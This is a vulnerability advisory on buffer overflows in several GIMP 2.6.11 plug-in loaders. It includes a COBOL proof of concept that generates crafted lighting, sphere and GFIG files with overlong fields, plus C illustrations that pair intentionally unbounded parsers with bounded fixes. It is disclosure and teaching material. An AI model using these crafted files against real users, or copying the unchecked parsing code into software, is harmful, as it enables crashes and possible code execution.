source: http://www.securityfocus.com/bid/45647/info

GIMP is prone to multiple buffer-overflow vulnerabilities because several of its plug-ins fail to bound user-supplied input when loading files. The Lighting Effects preset loader, the Sphere Designer loader and the GFIG loader copy overlong fields from a crafted text file into fixed-size stack buffers; the PSP image loader's RLE decoder honours a run length that extends past the allocated channel buffer.

Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the user running GIMP. Exploitation requires the victim to open a crafted preset, design or image file with the affected plug-in; failed attempts crash the plug-in, resulting in a denial of service.

GIMP 2.6.11 is vulnerable; other versions may also be affected.
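The three overflows the COBOL PoC below triggers share one shape: a preset line whose value is far longer than the fixed-size buffer the plug-in reads it into. The C program that follows is an added illustration of that bug class beside a bounded version; it is not GIMP's code. The "Position:" key, the 32-byte per-coordinate field and the sample line (sized like the PoC's lighting preset) are assumptions made for the illustration.

```c
/* Added example (not GIMP's code): the text-preset overflow pattern that the
 * PoC's crafted files exercise, beside a bounded version.
 * Assumptions: the key "Position: ", a 32-byte per-coordinate field and the
 * constructed sample line; only the shape of the bug is modelled. */
#include <stdio.h>
#include <string.h>

#define FIELD_LEN 32u   /* fixed-size field; "%31s" below is FIELD_LEN-1 */
#define GUARD_LEN 512u  /* scratch space after the field so the overrun is measurable */

/* Unbounded copy of the first token after the key into a FIELD_LEN field,
 * the same effect an unlimited "%s" conversion has: the copy stops at
 * whitespace, never at the field size. `field` must be followed by GUARD_LEN
 * spare bytes (scratch area) so this stays measurable here.
 * Returns how many bytes landed beyond the field. */
size_t preset_parse_unchecked(const char *line, char *field)
{
    const char *key = "Position: ";
    size_t k = strlen(key);
    if (strncmp(line, key, k) != 0)
        return 0;
    const char *p = line + k;
    size_t i = 0;
    while (*p != '\0' && *p != ' ' && *p != '\n')
        field[i++] = *p++;          /* no check of i against FIELD_LEN */
    field[i] = '\0';
    return i + 1 > FIELD_LEN ? i + 1 - FIELD_LEN : 0;
}

/* Bounded version: width-limited conversions plus an explicit check that no
 * token filled its field, so an overlong value is rejected rather than
 * silently truncated or split across coordinates.
 * 0 = ok, -1 = malformed line, -2 = overlong token. */
int preset_parse_checked(const char *line, char x[FIELD_LEN],
                         char y[FIELD_LEN], char z[FIELD_LEN])
{
    if (sscanf(line, "Position: %31s %31s %31s", x, y, z) != 3)
        return -1;
    if (strlen(x) >= FIELD_LEN - 1 || strlen(y) >= FIELD_LEN - 1 ||
        strlen(z) >= FIELD_LEN - 1)
        return -2;
    return 0;
}

/* Constructed line shaped like the PoC's lighting preset: a 117-character
 * first coordinate ('A' plus 4 x 29 'A's) followed by two sane ones. */
static size_t preset_make_crafted(char *buf, size_t len)
{
    const char *key = "Position: ";
    const char *tail = " -1 1\n";
    size_t k = strlen(key);
    if (len < k + 117 + strlen(tail) + 1)
        return 0;
    memcpy(buf, key, k);
    memset(buf + k, 'A', 117);
    memcpy(buf + k + 117, tail, strlen(tail) + 1);
    return k + 117 + strlen(tail);
}

size_t preset_overrun_unchecked(void)
{
    char line[160];
    char scratch[FIELD_LEN + GUARD_LEN];    /* field followed by guard */
    preset_make_crafted(line, sizeof line);
    return preset_parse_unchecked(line, scratch);   /* 86 */
}

int preset_checked_on_crafted(void)
{
    char line[160], x[FIELD_LEN], y[FIELD_LEN], z[FIELD_LEN];
    preset_make_crafted(line, sizeof line);
    return preset_parse_checked(line, x, y, z);     /* -2 */
}

int preset_checked_on_valid(void)
{
    char x[FIELD_LEN], y[FIELD_LEN], z[FIELD_LEN];
    int rc = preset_parse_checked("Position: 0.5 -1 1\n", x, y, z);
    if (rc != 0)
        return rc;
    return (strcmp(x, "0.5") == 0 && strcmp(y, "-1") == 0 &&
            strcmp(z, "1") == 0) ? 0 : -3;          /* 0 */
}

int main(void)
{
    printf("unchecked: %zu bytes past the field\n", preset_overrun_unchecked());
    printf("checked, crafted line: %d\n", preset_checked_on_crafted());
    printf("checked, valid line:   %d\n", preset_checked_on_valid());
    return 0;
}
```

For the PoC-sized token the unchecked copy writes 86 bytes past a 32-byte field. A width limit on its own is not a fix: on the crafted line `%31s` silently splits the 117-character token across all three coordinates and reports success, which is why the bounded parser also rejects any token that filled its field.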

000010 IDENTIFICATION DIVISION.
000020 PROGRAM-ID.              GIMP-OVERFLOWS-POC-IN-COBOL.
000030 AUTHOR.                  NON-CUSTOMERS CREW.
000040*SHOE SIZE DECLARATION.   43.
000050
000060 ENVIRONMENT DIVISION.
000070 INPUT-OUTPUT SECTION.
000080 FILE-CONTROL.
000090     SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
000100         ORGANIZATION IS LINE SEQUENTIAL.
000110     SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
000120         ORGANIZATION IS LINE SEQUENTIAL.
000130     SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
000140         ORGANIZATION IS LINE SEQUENTIAL.
000150*    FOR THE 4TH OVERFLOW, SEE BELOW.
000160
000170 DATA DIVISION.
000180 FILE SECTION.
000190 FD FILE01.
000200 01 PRINTLINE   PIC X(800).
000210 FD FILE02.
000220 01 QRINTLINE   PIC X(800).
000230 FD FILE03.
000240 01 RRINTLINE   PIC X(800).
000250
000260 WORKING-STORAGE SECTION.
000270 01 TEXT-OUT1   PIC X(29) VALUE 'Number of lights: 1'.
000280 01 TEXT-OUT2   PIC X(29) VALUE 'Type: Point'.
000290 01 TEXT-OUT3   PIC X(29) VALUE 'Position: A'.
000300 01 TEXT-OUT4   PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
000310 01 TEXT-OUT5   PIC X(29) VALUE ' -1 1'.
000320 01 TEXT-OUT6   PIC X(29) VALUE 'Direction: -1 -1 1'.
000330 01 TEXT-OUT7   PIC X(29) VALUE 'Color: 1 1 1'.
000340 01 TEXT-OUT8   PIC X(29) VALUE 'Intensity: 1'.
000350 01 TEXU-OUT1   PIC X(29) VALUE '0 0 A'.
000360 01 TEXU-OUT2   PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
000370 01 TEXU-OUT3   PIC X(29) VALUE '0 0 0 0 0 0 0'.
000380 01 TEXV-OUT1   PIC X(29) VALUE 'GFIG Version 0.2'.
000390 01 TEXV-OUT2   PIC X(29) VALUE 'Name: First\040Gfig'.
000400 01 TEXV-OUT3   PIC X(29) VALUE 'Version: 0.000000'.
000410 01 TEXV-OUT4   PIC X(29) VALUE 'ObjCount: 0'.
000420 01 TEXV-OUT5   PIC X(29) VALUE '<OPTIONS>'.
000430 01 TEXV-OUT6   PIC X(29) VALUE 'GridSpacing: 30'.
000440 01 TEXV-OUT7   PIC X(29) VALUE 'GridType: RECT_GRID'.
000450 01 TEXV-OUT8   PIC X(29) VALUE 'DrawGrid: FALSE'.
000460 01 TEXV-OUT9   PIC X(29) VALUE 'Snap2Grid: FALSE'.
000470 01 TEXV-OUTA   PIC X(29) VALUE 'LockOnGrid: FALSE'.
000480 01 TEXV-OUTB   PIC X(29) VALUE 'ShowControl: TRUE'.
000490 01 TEXV-OUTC   PIC X(29) VALUE '</OPTIONS>'.
000500 01 TEXV-OUTD   PIC X(29) VALUE '<Style Base>'.
000510 01 TEXV-OUTE   PIC X(29) VALUE 'BrushName:      Circle (11)'.
000520 01 TEXV-OUTF   PIC X(29) VALUE 'PaintType:       1'.
000530 01 TEXV-OUTG   PIC X(29) VALUE 'FillType:       0'.
000540 01 TEXV-OUTH   PIC X(29) VALUE 'FillOpacity:    100'.
000550 01 TEXV-OUTI   PIC X(29) VALUE 'Pattern:        Pine'.
000560 01 TEXV-OUTJ   PIC X(29) VALUE 'Gradient:      FG to BG (RGB)'.
000570 01 TEXV-OUTK   PIC X(29) VALUE 'Foreground: A'.
000580 01 TEXV-OUTL   PIC X(29) VALUE 'AA 0 0 1'.
000590 01 TEXV-OUTM   PIC X(29) VALUE 'Background: 1 1 1 1'.
000600 01 TEXV-OUTN   PIC X(29) VALUE '</Style>'.
000610
000620 PROCEDURE DIVISION.
000630 MAIN-PARAGRAPH.
000640*   1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
000650        OPEN OUTPUT FILE01.
000660        WRITE PRINTLINE FROM TEXT-OUT1.
000670        WRITE PRINTLINE FROM TEXT-OUT2.
000675*   AFTER ADVANCING 0 LINES SUPPRESSES THE LINE BREAK, SO THE WRITES
000676*   BELOW CHAIN 117 'A's INTO ONE OVERLONG "Position:" FIELD.
000680        WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
000690        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000700        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000710        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000720        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000730        WRITE PRINTLINE FROM TEXT-OUT5.
000740        WRITE PRINTLINE FROM TEXT-OUT6.
000750        WRITE PRINTLINE FROM TEXT-OUT7.
000760        WRITE PRINTLINE FROM TEXT-OUT8.
000770        CLOSE FILE01.
000780
000790*   2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
000800        OPEN OUTPUT FILE02.
000810        WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
000820        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000830        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000840        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000850        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000860        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000870        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000880        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000890        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000900        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000910        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000920        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000930        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000940        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000950        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000960        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000970        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000980        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000990        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001000        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001010        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001020        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001030        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001040        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001050        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001060        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001070        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001080        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001090        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001100        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001110        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001120        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001130        WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
001140        WRITE QRINTLINE FROM TEXU-OUT3.
001150        CLOSE FILE02.
001160
001170*   3. FILTERS > RENDER > GFIG > FILE > OPEN
001180        OPEN OUTPUT FILE03.
001190        WRITE RRINTLINE FROM TEXV-OUT1.
001200        WRITE RRINTLINE FROM TEXV-OUT2.
001210        WRITE RRINTLINE FROM TEXV-OUT3.
001220        WRITE RRINTLINE FROM TEXV-OUT4.
001230        WRITE RRINTLINE FROM TEXV-OUT5.
001240        WRITE RRINTLINE FROM TEXV-OUT6.
001250        WRITE RRINTLINE FROM TEXV-OUT7.
001260        WRITE RRINTLINE FROM TEXV-OUT8.
001270        WRITE RRINTLINE FROM TEXV-OUT9.
001280        WRITE RRINTLINE FROM TEXV-OUTA.
001290        WRITE RRINTLINE FROM TEXV-OUTB.
001300        WRITE RRINTLINE FROM TEXV-OUTC.
001310        WRITE RRINTLINE FROM TEXV-OUTD.
001320        WRITE RRINTLINE FROM TEXV-OUTE.
001330        WRITE RRINTLINE FROM TEXV-OUTF.
001340        WRITE RRINTLINE FROM TEXV-OUTG.
001350        WRITE RRINTLINE FROM TEXV-OUTH.
001360        WRITE RRINTLINE FROM TEXV-OUTI.
001370        WRITE RRINTLINE FROM TEXV-OUTJ.
001380        WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
001390        WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001400        WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001410        WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001420        WRITE RRINTLINE FROM TEXV-OUTL.
001430        WRITE RRINTLINE FROM TEXV-OUTM.
001440        WRITE RRINTLINE FROM TEXV-OUTN.
001450        CLOSE FILE03.
001460
001470*   4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
001480*      OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
001490*      STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
001500*      ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
001510
001520*      HAPPY NEW YEAR!!!               http://rock-madrid.com/
001530
001540        STOP RUN.
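Item 4 of the PoC's trailing comments names the PSP loader bug but ships no file for it. As an added example that is neither GIMP's read_channel_data() nor a PSP file, the C program below models that bug class: a run-length decoder that trusts the run count over the output space left in the channel, beside a bounded decoder. The RLE convention it assumes (a count byte above 128 repeats the next byte count-128 times, otherwise a literal run of count bytes), the 16-byte channel and the crafted run are assumptions for illustration.

```c
/* Added example (not GIMP's code, not a PSP file): model of the RLE channel
 * overflow described in item 4, beside a bounded decoder.
 * Assumed RLE convention: count > 128 -> repeat next byte (count-128) times,
 * otherwise copy `count` literal bytes. Channel size and input are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NPIXELS   16u     /* bytes in the (constructed) channel buffer */
#define GUARD_LEN 1024u   /* spare bytes after it so the overrun is measurable */

/* Unchecked decoder: every run is written in full; the only bound is the
 * *input* length. A long run that starts near the end of the channel runs
 * past `out`. Returns bytes written, which may exceed npixels. */
size_t rle_decode_unchecked(const uint8_t *in, size_t inlen,
                            uint8_t *out, size_t npixels)
{
    size_t p = 0, q = 0;
    while (q < npixels && p < inlen) {
        uint8_t runcount = in[p++];
        size_t n;
        if (runcount > 128) {
            n = runcount - 128;
            if (p >= inlen)
                break;
            memset(out + q, in[p++], n);    /* q + n may exceed npixels */
        } else {
            n = runcount;
            if (n > inlen - p)
                n = inlen - p;
            memcpy(out + q, in + p, n);     /* same problem */
            p += n;
        }
        q += n;
    }
    return q;
}

/* Bounded decoder: check each run against the output space that is left and
 * refuse input that claims more. 0 = ok, -1 = truncated input,
 * -2 = run overshoots the channel. */
int rle_decode_checked(const uint8_t *in, size_t inlen,
                       uint8_t *out, size_t npixels, size_t *written)
{
    size_t p = 0, q = 0;
    while (q < npixels) {
        if (p >= inlen)
            return -1;
        uint8_t runcount = in[p++];
        size_t n;
        if (runcount > 128) {
            n = runcount - 128;
            if (p >= inlen)
                return -1;
            if (n > npixels - q)
                return -2;
            memset(out + q, in[p++], n);
        } else {
            n = runcount;
            if (n > inlen - p)
                return -1;
            if (n > npixels - q)
                return -2;
            memcpy(out + q, in + p, n);
            p += n;
        }
        q += n;
    }
    *written = q;
    return 0;
}

/* Constructed input: 12 literal bytes, then a run claiming 100 pixels
 * (0xE4 = 128 + 100) when only 4 remain in the channel. */
static const uint8_t rle_crafted[] = {
    0x0C, 'A','A','A','A','A','A','A','A','A','A','A','A',
    0xE4, 'B'
};

/* Decode the crafted stream with the unchecked decoder into a guarded
 * scratch buffer and count how many guard bytes it clobbered. */
size_t rle_overflow_bytes_unchecked(void)
{
    uint8_t scratch[NPIXELS + GUARD_LEN];
    size_t clobbered = 0;
    memset(scratch, 0xAA, sizeof scratch);
    rle_decode_unchecked(rle_crafted, sizeof rle_crafted, scratch, NPIXELS);
    for (size_t i = NPIXELS; i < sizeof scratch; i++)
        if (scratch[i] != 0xAA)
            clobbered++;
    return clobbered;                                   /* 96 */
}

int rle_checked_on_crafted(void)
{
    uint8_t out[NPIXELS];
    size_t written = 0;
    return rle_decode_checked(rle_crafted, sizeof rle_crafted,
                              out, NPIXELS, &written);  /* -2 */
}

size_t rle_checked_on_valid(void)
{
    static const uint8_t ok[] = { 0x84, 'A', 0x8C, 'B' };  /* 4 x 'A', 12 x 'B' */
    uint8_t out[NPIXELS];
    size_t written = 0;
    if (rle_decode_checked(ok, sizeof ok, out, NPIXELS, &written) != 0)
        return 0;
    return (out[0] == 'A' && out[15] == 'B') ? written : 0;  /* 16 */
}

int main(void)
{
    printf("unchecked: %zu bytes past the channel\n", rle_overflow_bytes_unchecked());
    printf("checked, crafted: %d\n", rle_checked_on_crafted());
    printf("checked, valid:   %zu bytes decoded\n", rle_checked_on_valid());
    return 0;
}
```

The unchecked decoder's final run lands 96 bytes past the 16-byte channel (measured against a guard area here; in a real loader those bytes are whatever follows the allocation). The bounded decoder rejects the same stream with -2 and still decodes a well-formed one in full.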
